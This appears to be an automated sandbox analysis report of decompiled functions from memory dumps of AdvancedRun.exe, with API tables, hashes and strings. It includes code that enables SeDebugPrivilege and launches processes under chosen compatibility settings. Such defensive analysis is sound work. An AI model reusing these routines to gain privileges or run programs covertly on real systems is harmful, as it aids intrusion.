Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
memcpy.MSVCRT ref: 00405556

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}

0x00405adf
0x00405ae6
0x00405af5
0x00405af6
0x00405afb
0x00405b00
0x00405b0a
0x00405b18
0x00405b19
0x00405b1e
0x00405b2c
0x00405b2d
0x00405b36
0x00405b37
0x00405b3c
0x00405b4a
0x00405b4b
0x00405b54
0x00405b55
0x00405b5a
0x00405b68
0x00405b69
0x00405b72
0x00405b73
0x00405b7b
0x00000000
0x00405b7b
0x00405b80

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405B19
??2@YAPAXI@Z.MSVCRT ref: 00405B37
??2@YAPAXI@Z.MSVCRT ref: 00405B55
??2@YAPAXI@Z.MSVCRT ref: 00405B73

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AdvancedRun.exe PID: 7016 Parent PID: 744 AdvancedRun.exeCOMMON

Executed Functions

Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}

APIs

GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

GetLastError.KERNEL32(00000000), ref: 00408FEA
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E

Strings

AdjustTokenPrivileges, xrefs: 00409039
LookupPrivilegeValueW, xrefs: 00409005

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
API String ID: 616250965-1253513912
Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68

Uniqueness

Uniqueness Score: -1.00%

Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

APIs

memset.MSVCRT ref: 00402300
memset.MSVCRT ref: 0040233E
memset.MSVCRT ref: 00402356

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

wcschr.MSVCRT ref: 00402387
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0

Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69

wcschr.MSVCRT ref: 004023B7
memset.MSVCRT ref: 004023D9
SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
wcschr.MSVCRT ref: 0040242B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
memset.MSVCRT ref: 004024BE
memset.MSVCRT ref: 004024D1
_wtoi.MSVCRT ref: 00402519
_wtoi.MSVCRT ref: 0040252B
memset.MSVCRT ref: 00402561
memset.MSVCRT ref: 00402574
_wtoi.MSVCRT ref: 004025BC
_wtoi.MSVCRT ref: 004025CE
wcschr.MSVCRT ref: 004025F0
memset.MSVCRT ref: 0040260F
ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
_snwprintf.MSVCRT ref: 0040264C
SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888

Strings

D, xrefs: 00402374
640X480, xrefs: 004026CE
"%s" %s, xrefs: 0040263B
HIGHDPIAWARE, xrefs: 004026FB
256COLOR, xrefs: 004026AE
RunAsInvoker, xrefs: 00402677
16BITCOLOR, xrefs: 004026BA
DISABLETHEMES, xrefs: 004026DD
DISABLEDWM, xrefs: 004026EC
__COMPAT_LAYER, xrefs: 00402814

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
API String ID: 2452314994-435178042
Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}

0x00408533
0x00408533
0x00408536
0x0040853e
0x00408546
0x0040854d
0x00408559
0x00408563
0x00408569
0x00408572
0x00408583
0x0040858d
0x00408595
0x0040859e
0x004085a2
0x004085a6
0x004085aa
0x004085ae
0x004085b8
0x004085c1
0x004085c8
0x004085cd
0x004085cf
0x0040867f
0x00408688
0x0040868d
0x0040868f
0x00408730
0x00408735
0x00408737
0x0040873d
0x00408750
0x0040875d
0x00408763
0x00408770
0x00408775
0x00408779
0x0040878b
0x00408790
0x004087a2
0x004087aa
0x004087b8
0x004087be
0x004087c3
0x004087c9
0x004087d2
0x004087df
0x004087e3
0x004087e6
0x00408801
0x004087e8
0x004087f8
0x004087fe
0x00408811
0x00408816
0x00408816
0x0040881c
0x00408822
0x00408779
0x00408824
0x00408829
0x00408833
0x00408834
0x00408840
0x00408848
0x0040884c
0x00408850
0x00408855
0x0040885a
0x00408860
0x004088ac
0x004088b1
0x004088b3
0x004088bf
0x004088c5
0x004088cb
0x004088da
0x004088ea
0x004088ed
0x004088f8
0x004088ff
0x00408905
0x004088b5
0x004088b5
0x004088b5
0x00000000
0x00408862
0x00408862
0x0040886d
0x00408874
0x0040887b
0x00408882
0x00408889
0x00408895
0x00408897
0x00408658
0x00408658
0x0040865d
0x00408661
0x0040866a
0x00408673
0x00408678
0x00000000
0x00408678
0x00408860
0x00408695
0x00408695
0x0040869f
0x004086a2
0x004086af
0x004086a4
0x004086a7
0x004086a7
0x004086b4
0x004086bf
0x004086cb
0x004086d3
0x004086d7
0x004086db
0x004086e0
0x004086f1
0x004086f8
0x004086ff
0x00408706
0x0040870d
0x00408719
0x0040871b
0x00000000
0x0040871b
0x004085d5
0x004085da
0x00000000
0x00000000
0x004085ec
0x004085ef
0x004085f6
0x004085fd
0x00408604
0x0040860b
0x00408612
0x00408616
0x00408620
0x0040862a
0x00408632
0x00408633
0x00408638
0x0040864a
0x0040864f
0x00408651
0x00000000
0x0040854f
0x0040854f
0x00408550
0x00408556
0x00408556

APIs

Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
swscanf.MSVCRT ref: 00408620
_wtoi.MSVCRT ref: 00408633

Strings

, xrefs: 00408595
%I64x, xrefs: 004085E7
/Run, xrefs: 0040867F
/savelangfile, xrefs: 004088A3
XA, xrefs: 004088E5
SeDebugPrivilege, xrefs: 004085B3
/cfg, xrefs: 00408727
`oA, xrefs: 004088D0

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
API String ID: 3933224404-3784219877
Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A

Uniqueness

Uniqueness Score: -1.00%

